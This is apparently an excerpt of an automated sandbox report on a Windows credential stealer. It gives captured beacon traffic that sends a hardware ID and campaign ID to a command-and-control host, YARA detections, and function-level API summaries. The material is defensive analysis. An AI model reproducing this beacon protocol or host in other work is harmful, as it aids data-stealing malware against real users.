2025-01-02 19:16:44 UTC	15331	OUT	Data Raw: 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 42 Data Ascii: --BN7PQMTTJNCXTFContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--BN7PQMTTJNCXTFContent-Disposition: form-data; name="pid"3--BN7PQMTTJNCXTFContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--B
2025-01-02 19:16:44 UTC	5053	OUT	Data Raw: fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-02 19:16:44 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5q5nulci3f4afssti5ntr09pdi; expires=Mon, 28 Apr 2025 13:03:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B%2FgCAnB5ALqfwen6jDo5T9gPiX2WZ4QAzCFkHVp8KGKBwlz2HDVK3lTr9RixxAVK7ozB3z91Kzc5Ey%2B8IBiA5Ig6Db9Ho8nDwKzJEPyr%2BHuarwFU8A9i4AQrSVx%2Bbj9cIU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15d0bb7c8cc3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=1981&rtt_var=806&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21341&delivery_rate=1474003&cwnd=224&unsent_bytes=0&cid=83a8135969cbe787&ts=662&x=0"
2025-01-02 19:16:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-02 19:16:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49706	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:46 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KNV94W4VEHFS6930 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1229 Host: lev-tolstoi.com
2025-01-02 19:16:46 UTC	1229	OUT	Data Raw: 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 Data Ascii: --KNV94W4VEHFS6930Content-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--KNV94W4VEHFS6930Content-Disposition: form-data; name="pid"1--KNV94W4VEHFS6930Content-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
2025-01-02 19:16:46 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mam6b2g7j068k07lon3ctfssbp; expires=Mon, 28 Apr 2025 13:03:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Vb8N3xKsQKJNfsPjzFOWhomWOQGfr%2BQ7%2FBy69Eng97UfXhOxZ0ozVqB%2B2R0zj1Qjsw3FEIalSlkB8KYp37iAGedVz3Do7JmK7Kyu40RRIJkOwfJK0qbOLHT8qR%2FB0teoKc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15dc3d2d4358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=63904&min_rtt=24347&rtt_var=35103&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2143&delivery_rate=119932&cwnd=206&unsent_bytes=0&cid=b416c2a74d3897da&ts=491&x=0"
2025-01-02 19:16:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-02 19:16:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49708	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:47 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KR9OPG0Z12N8NXIBQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1125 Host: lev-tolstoi.com
2025-01-02 19:16:47 UTC	1125	OUT	Data Raw: 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 Data Ascii: --KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="pid"1--KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
2025-01-02 19:16:47 UTC	1119	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h3179cc41vobqol01eb8u15en6; expires=Mon, 28 Apr 2025 13:03:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wi9V6ISJ4RLyUHnNT0aNCdbJts5xdVjnjJY5PbELRl9uO9yagusheP8c9EZlekMYUhJ8HbGKcsn6pgCCWwbcZukJmDvs3zQR025FtTzAxcVxzvNKdwUHWjYyxolbCRlY46I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15e2ee78de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9783&min_rtt=2104&rtt_var=5544&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2040&delivery_rate=1387832&cwnd=245&unsent_bytes=0&cid=854edcfe7da37e93&ts=507&x=0"
2025-01-02 19:16:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-02 19:16:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49714	172.67.157.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:48 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: lev-tolstoi.com
2025-01-02 19:16:48 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=1CAF9CB3F3F835CB88B9F97B60ED618D
2025-01-02 19:16:49 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:16:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=om4r0hpktndkbufg26flom9l35; expires=Mon, 28 Apr 2025 13:03:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKGhi3H3HnV0AlRvkiY9hIuGfwYwZvbgN2oDkHHKwhKq6ckvI8NKkEHV8x4OuyuXJgnfHSOD9TcrKc7gx0VJZavsp%2FLTsCONB%2FzMFa9lIaguQWp9EB3ryJ0EMiRMC9pijkk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd15ea5e144337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17093&min_rtt=14933&rtt_var=9920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1021&delivery_rate=90638&cwnd=222&unsent_bytes=0&cid=a763dfa023cdfa66&ts=867&x=0"
2025-01-02 19:16:49 UTC	54	IN	Data Raw: 33 30 0d 0a 66 64 45 47 56 67 38 65 68 2b 48 59 4a 72 78 5a 47 69 7a 54 37 78 67 58 42 51 4e 6d 43 51 54 47 4d 30 46 71 49 71 7a 66 47 59 63 6d 6a 41 3d 3d 0d 0a Data Ascii: 30fdEGVg8eh+HYJrxZGizT7xgXBQNmCQTGM0FqIqzfGYcmjA==
2025-01-02 19:16:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:16:34
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	317'952 bytes
MD5 hash:	2EA329CF21FE95C260EA3B956B6FBB75
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1287375743.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1300615651.0000000000781000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:16:48
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856
Imagebase:	0x4f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	69.6%
Total number of Nodes:	481
Total number of Limit Nodes:	26

Executed Functions

Function 00437DD0 Relevance: 34.0, APIs: 11, Strings: 8, Instructions: 726
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C), ref: 0043807C
SysAllocString.OLEAUT32(B9F7B704), ref: 004380E8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438125
SysAllocString.OLEAUT32(47174513), ref: 00438185
SysAllocString.OLEAUT32(B5F1B3C1), ref: 0043821F
VariantInit.OLEAUT32(XQRS), ref: 0043828A
VariantClear.OLEAUT32(XQRS), ref: 00438519
SysFreeString.OLEAUT32(?), ref: 0043853D
SysFreeString.OLEAUT32(?), ref: 00438543
SysFreeString.OLEAUT32(00000000), ref: 00438554
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438588

Strings

MXE, xrefs: 00437F55
WHIJ, xrefs: 00438634
\`D, xrefs: 0043805C
Hwt, xrefs: 0043804C
XQRS, xrefs: 00437E28
`;M, xrefs: 00438640
:, xrefs: 00437FC9
D_X, xrefs: 004382CB

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: :$Hwt$MXE$WHIJ$XQRS$\`D$`;M$D_X
API String ID: 2573436264-2768600242
Opcode ID: 9fd90adbbd83c18043c5aa7b7f992eed34e85813c72d797529d7f06a4ed84b05
Instruction ID: 5f7ee7c7399156ef7b7e299cb0dbb6b514117c90105b6ce6de4eacd2dcfad572
Opcode Fuzzy Hash: 9fd90adbbd83c18043c5aa7b7f992eed34e85813c72d797529d7f06a4ed84b05
Instruction Fuzzy Hash: 2732EF72A083509BD310CF25C88179BFBE5EF99314F18892EF595DB380E679D9058B86

Function 0040E7E4 Relevance: 23.1, APIs: 2, Strings: 13, Instructions: 577
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040E7F0
CoUninitialize.COMBASE ref: 0040EBC3

Strings

TQRn, xrefs: 0040EC53
nv, xrefs: 0040EE1F
tr, xrefs: 0040EE40
|\7y, xrefs: 0040EB3F
LW@G, xrefs: 0040EC48
|\7y, xrefs: 0040EF38
l, xrefs: 0040EE8D
lev-tolstoi.com, xrefs: 0040EB9E, 0040EF87
XYOq, xrefs: 0040E8C5
Z[K_, xrefs: 0040EC3D
E, xrefs: 0040EC7F
XYOq, xrefs: 0040EB8D
=;', xrefs: 0040EC74

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Uninitialize
String ID: =;'$E$LW@G$TQRn$XYOq$XYOq$Z[K_$l$lev-tolstoi.com$nv$tr$|\7y$|\7y
API String ID: 3861434553-2326245944
Opcode ID: f0af35338d8a968c5eaa140309c8f0cddc258756cce5a68323755f63809a90dc
Instruction ID: c53147e7ceb87a1525af61496e46eed0648db5acb92f28f93d7ff45d9e5b06c9
Opcode Fuzzy Hash: f0af35338d8a968c5eaa140309c8f0cddc258756cce5a68323755f63809a90dc
Instruction Fuzzy Hash: ED028CB150D3C18BD3328F2684A07EBBBE0AF97314F184D6DD5D96B392D63A0805CB5A

Function 004278A0 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 798
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L[, xrefs: 00428011
0Z7\, xrefs: 0042806E
67, xrefs: 0042866D
'b7d, xrefs: 004280AD
>n0`, xrefs: 004280A2
2f&x, xrefs: 004280B8
%&, xrefs: 0042821C
Y, xrefs: 00428019
+z>|, xrefs: 004280C3

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: %&$'b7d$+z>|$0Z7\$2f&x$67$>n0`$L[$Y
API String ID: 0-222560991
Opcode ID: 6601ab9ab9b644408d8ccec013c20ab3cbc7244c84165e51234428316aa982db
Instruction ID: 1eba43183b78657d2ec025f33ba4bd6dbd30055c41ba690c7bee636d554fb25b
Opcode Fuzzy Hash: 6601ab9ab9b644408d8ccec013c20ab3cbc7244c84165e51234428316aa982db
Instruction Fuzzy Hash: C04224B5A083518FC3248F28E85136FB7E1EBC5314F498A3DE9D59B391DB789805CB86

Function 0041A273 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EYSh, xrefs: 0041A9A1
`jda, xrefs: 0041A98B
P[_D, xrefs: 0041A9AC
vsMM, xrefs: 0041A9C2
U@It, xrefs: 0041A9CD
L@v|, xrefs: 0041A9B7
3.A<, xrefs: 0041A81C

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 3.A<$EYSh$L@v|$P[_D$U@It$`jda$vsMM
API String ID: 0-2446076125
Opcode ID: 2a14b742d65583bfda0f78b44a885def0ba80dec5df2ee51d36828b82c1c7075
Instruction ID: 8c585a461151c81bba74b8734b5cb7031e895881b1a011cc9bba6ab4444b49a5
Opcode Fuzzy Hash: 2a14b742d65583bfda0f78b44a885def0ba80dec5df2ee51d36828b82c1c7075
Instruction Fuzzy Hash: AAD106B1A093418BD724CF24C8917AFB7E1EBC5314F19892EE49997391E738DC428B4B

Function 00424950 Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 629
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 00424E71
s, xrefs: 00424E78
h~, xrefs: 00424B4B
k, xrefs: 00424F97
p|, xrefs: 00424B59

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: t$h~$k$p|$s
API String ID: 0-4107611172
Opcode ID: 5c6bf36c0375983148688f16e7e4052c03093512addb715ea89e273d52cfd3b8
Instruction ID: 46ff63fa0f42428502a4572981796c4815eaac668413a0dd1d4e32a1ac5cc054
Opcode Fuzzy Hash: 5c6bf36c0375983148688f16e7e4052c03093512addb715ea89e273d52cfd3b8
Instruction Fuzzy Hash: C91276B4A00316CFDB00CFA8D8816AABBB1FF46314F5582ADD9456F391D3799842CF95

Function 0042CB9F Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042CC88
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042CCC4
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042CDFD

Strings

7SO|, xrefs: 0042CFF0
Y:, xrefs: 0042CFDB

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: 7SO|$Y:
API String ID: 2243422189-331956180
Opcode ID: c04b4799174f8eb22ea3c1c90751e6bd9b4b6783ebfa62ded5f4eaf2dd07ba73
Instruction ID: 3b35ccf2beb8d06d415e8115d5231f64daf1752e1a9548f943f7687b18b0c208
Opcode Fuzzy Hash: c04b4799174f8eb22ea3c1c90751e6bd9b4b6783ebfa62ded5f4eaf2dd07ba73
Instruction Fuzzy Hash: 54E101716083D08ED735CB25D8507ABBBD29FE7304F5888AED0C99B282DA794506CB67

Function 0040AC40 Relevance: 7.9, Strings: 6, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

QV", xrefs: 0040B020, 0040B10D, 0040B059, 0040B104, 0040B064, 0040B0D0, 0040AEE5
'>?0, xrefs: 0040ADB1
QF, xrefs: 0040AD19
bfVT, xrefs: 0040AC52
QV", xrefs: 0040AF8C
muw, xrefs: 0040AF10

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: QV"$ QV"$'>?0$QF$bfVT$muw
API String ID: 0-1773726041
Opcode ID: f183004b8afbaf8c4098fa454fb759349bd63669b9d4d61da270fec7344e7e53
Instruction ID: 2b09c4998ba2a0006662a38d3ccca405f63efca502306c7653717ec05fcb1026
Opcode Fuzzy Hash: f183004b8afbaf8c4098fa454fb759349bd63669b9d4d61da270fec7344e7e53
Instruction Fuzzy Hash: 67D1387664C3558BC320DF24885026BFBE2EBC5350F1C893DE8E55B381D779991A878B

Function 004087A0 Relevance: 7.6, APIs: 5, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087C4
GetCurrentThreadId.KERNEL32 ref: 004087CE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088F5
GetForegroundWindow.USER32 ref: 0040890A

Part of subcall function 0040D000: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D013

Part of subcall function 0040BB60: FreeLibrary.KERNEL32(0040895D), ref: 0040BB66
Part of subcall function 0040BB60: FreeLibrary.KERNEL32 ref: 0040BB87

ExitProcess.KERNEL32 ref: 00408964

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 6adf2c4adff5663b792584f45a1ca5a280b2db619a45e652ac6a474fa48604cb
Instruction ID: 9a1bf80dafd23c1d70cb7e2d91139f0b708e74a3f09392a7315ff1b111803ca1
Opcode Fuzzy Hash: 6adf2c4adff5663b792584f45a1ca5a280b2db619a45e652ac6a474fa48604cb
